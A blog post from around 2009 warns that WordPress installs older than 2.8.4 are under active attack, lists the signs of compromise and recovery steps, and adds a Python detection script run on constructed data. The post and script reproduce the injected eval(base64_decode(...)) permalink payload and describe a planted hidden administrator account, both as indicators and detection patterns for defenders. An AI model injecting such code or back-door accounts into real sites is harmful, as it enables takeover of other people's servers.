Self-Hosted WordPress Blogs Under Attack

Beware! If you are running a self-hosted WordPress blog that has not been upgraded to version 2.8.4, there is a good chance it has already been hacked or will be very soon. So, if you haven't already, buck up and do what needs doing: update.

Lorelle on WordPress warns that WordPress installations older than 2.8.4 are being actively attacked and will be compromised if proper care is not taken. Here's an excerpt:

Otto42 of OttoDestruct, a key WordPress developer and supporter, reports that there is an “attack” on older versions of WordPress right now. The number of sites hit by this is growing every hour. Protect your WordPress blog now: UPDATE NOW!!!

How Do I Know If My Site Has Already Been Attacked?

There are two clues that your WordPress site has been attacked.

There are strange additions to the pretty permalinks, such as example.com/category/post-title/%&(%7B$%7Beval(base64_decode($_SERVER%5BHTTP_REFERER%5D))%7D%7D|.+)&%/. The keywords are “eval” and “base64_decode.”

The second clue is that a “back door” was created by a “hidden” Administrator. Check your site users for “Administrator (2)” or a name you do not recognize. You will probably be unable to access that account, but Journey Etc. has a possible solution.

WordPress.com blogs are not impacted as they are up-to-date. Only versions prior to WordPress 2.8.4 are impacted.

To Prevent Your WordPress Blog from Attack

To prevent this form of attack, update your WordPress site IMMEDIATELY to the latest version. Change ALL passwords to a strong password immediately, including WordPress blog access for all users, database, FTP, control panels, everything.

See the articles below for more helpful information on how to harden and protect your WordPress blog.

If Your WordPress Blog Has Been Attacked

If your site has already been attacked, it appears that the hack attacks the database, going deep. We’re looking for solutions, but the easiest appears to be to export all your content with the built-in XML WordPress export (pre 2.1 versions, try the WordPress-to-WordPress Import WordPress Plugin) and literally remove your WordPress installation totally (save images and general files). DO NOT EXPORT YOUR DATABASE! Install the latest version of WordPress and add the “clean” backup of your WordPress Theme, then import the XML export. The export will contain your posts, Pages, and comments, and hopefully no other hacked code.

“How To Completely Clean Your Hacked WordPress Installation” by Smackdown is a good article on how to reinstall WordPress after being hacked, but take care to keep your export limited to the post content and comments (and Pages), not the entire database as the hack goes into the database.
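The checks described in the excerpt above, written out as an added example (this is not code from the original post, from Lorelle, or from WordPress itself). It looks for the first clue in two places, the URL-decoded request paths of an access log and the permalink_structure row of wp_options where WordPress stores the permalink pattern, looks for the second clue by listing administrator accounts straight from wp_users/wp_usermeta rather than the dashboard, and finally scans a WXR export for injected code before it is re-imported. Assumptions: Apache common/combined log lines, the default `wp_` table prefix, an in-memory SQLite stand-in for the MySQL tables, and all sample data (log lines, user rows, the "Administrator (2)" back-door account, the export document) is constructed for the illustration; the iframe check is a heuristic, not part of the reported attack.

```python
"""Added example (not from the original post or WordPress): checks for the two clues
described above, the injected eval/base64_decode code and an unrecognised admin account,
plus a scan of the WXR export before re-import.  All inputs below are constructed."""
import re
import sqlite3
from urllib.parse import unquote
from xml.etree import ElementTree as ET

# The injected PHP: eval() over base64_decode(), as seen in the mangled permalinks.
INJECTED_CODE = re.compile(r"eval\s*\(\s*base64_decode\s*\(", re.IGNORECASE)
# Apache common/combined log request line (assumed format of the sample lines).
LOG_LINE = re.compile(r'^(\S+) \S+ \S+ \[[^\]]+\] "(?:GET|POST|HEAD) (\S+) HTTP/[\d.]+"')


def suspicious_requests(log_lines):
    """Clue 1 in the access log: (client, decoded path) for each request carrying the
    signature.  Paths are URL-decoded first so %28 / %7B encodings cannot hide it."""
    hits = []
    for line in log_lines:
        m = LOG_LINE.match(line)
        path = unquote(m.group(2)) if m else ""
        if INJECTED_CODE.search(path):
            hits.append((m.group(1), path))
    return hits


def injected_permalink_structure(conn, prefix="wp_"):
    """Clue 1 at its source: WordPress keeps the permalink pattern in the wp_options row
    'permalink_structure'.  Returns the stored value if it is tainted, else None."""
    row = conn.execute(f"SELECT option_value FROM {prefix}options "
                       "WHERE option_name = 'permalink_structure'").fetchone()
    return row[0] if row and INJECTED_CODE.search(row[0]) else None


def admin_accounts(conn, prefix="wp_"):
    """Clue 2: accounts whose serialized wp_capabilities grant administrator, read from
    wp_users/wp_usermeta instead of trusting the dashboard's user listing."""
    return conn.execute(f"""
        SELECT u.ID, u.user_login, u.display_name
        FROM {prefix}users AS u JOIN {prefix}usermeta AS m ON m.user_id = u.ID
        WHERE m.meta_key = '{prefix}capabilities' AND m.meta_value LIKE '%"administrator"%'
        ORDER BY u.ID""").fetchall()


def unexpected_admins(conn, known_logins, prefix="wp_"):
    """Administrators whose login is not on the site owner's own list."""
    return [row for row in admin_accounts(conn, prefix) if row[1] not in known_logins]


def tainted_export_items(wxr_xml):
    """Recovery check: titles of export items whose body carries the signature (or an
    iframe, a heuristic), so they can be cleaned before the XML is imported."""
    ns = {"content": "http://purl.org/rss/1.0/modules/content/"}
    tainted = []
    for item in ET.fromstring(wxr_xml).iter("item"):
        body = item.findtext("content:encoded", default="", namespaces=ns)
        if INJECTED_CODE.search(body) or "<iframe" in body.lower():
            tainted.append(item.findtext("title"))
    return tainted


# --- constructed sample data, not real traffic or a real site ---------------------------
SAMPLE_LOG = [
    '203.0.113.7 - - [05/Sep/2009:10:14:02 +0000] "GET /category/post-title/ HTTP/1.1" 200 5120',
    '203.0.113.9 - - [05/Sep/2009:10:14:05 +0000] "GET /category/post-title/'
    '%&(%7B$%7Beval(base64_decode($_SERVER%5BHTTP_REFERER%5D))%7D%7D|.+)&%/ HTTP/1.1" 200 5120',
]
INJECTED_PERMALINK = "/%category%/%postname%/%&({${eval(base64_decode($_SERVER[HTTP_REFERER]))}}|.+)&%/"
SAMPLE_WXR = """<rss version="2.0" xmlns:content="http://purl.org/rss/1.0/modules/content/"><channel>
<item><title>Clean post</title><content:encoded><![CDATA[<p>Hello world.</p>]]></content:encoded></item>
<item><title>Injected post</title><content:encoded><![CDATA[<p>Text</p>
<?php eval(base64_decode('aGVsbG8=')); ?>]]></content:encoded></item>
</channel></rss>"""


def sample_database():
    """In-memory stand-in for wp_users, wp_usermeta and wp_options (default 'wp_' prefix)."""
    conn = sqlite3.connect(":memory:")
    conn.executescript("""
        CREATE TABLE wp_users (ID INTEGER PRIMARY KEY, user_login TEXT, display_name TEXT);
        CREATE TABLE wp_usermeta (umeta_id INTEGER PRIMARY KEY, user_id INTEGER,
                                  meta_key TEXT, meta_value TEXT);
        CREATE TABLE wp_options (option_name TEXT PRIMARY KEY, option_value TEXT);""")
    conn.executemany("INSERT INTO wp_users VALUES (?, ?, ?)", [
        (1, "admin", "admin"), (2, "editor", "Site Editor"),
        (3, "administrator", "Administrator (2)")])          # the planted back door
    conn.executemany("INSERT INTO wp_usermeta VALUES (?, ?, ?, ?)", [
        (1, 1, "wp_capabilities", 'a:1:{s:13:"administrator";b:1;}'),
        (2, 2, "wp_capabilities", 'a:1:{s:6:"editor";b:1;}'),
        (3, 3, "wp_capabilities", 'a:1:{s:13:"administrator";b:1;}')])
    conn.execute("INSERT INTO wp_options VALUES (?, ?)", ("permalink_structure", INJECTED_PERMALINK))
    return conn


if __name__ == "__main__":
    db = sample_database()
    print("suspicious requests:", suspicious_requests(SAMPLE_LOG))
    print("tainted permalink_structure:", injected_permalink_structure(db))
    print("unexpected admins:", unexpected_admins(db, {"admin"}))
    print("tainted export items:", tainted_export_items(SAMPLE_WXR))
```

Against a real site the same queries run unchanged in phpMyAdmin or the mysql client, with the prefix taken from wp-config.php; the point of reading wp_usermeta directly is that a planted administrator is a row in that table whether or not the Users screen shows it. A clean export is one where tainted_export_items returns an empty list.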




About the Author

Abhinav Kaiser is a certified project manager (PMP) and an expert in IT service management. He has been writing on several blogs for over 6 years and has been a source of inspiration for many budding bloggers. He recently started a blog, Abhinav PMP, and his latest baby in the works needs special mention: Success Mantras.

Comments (1)


  1. This is very true. I have never updated my blog for over a year due to theme compatibility issues; then one day someone deleted all of the posts I had published over almost a year.
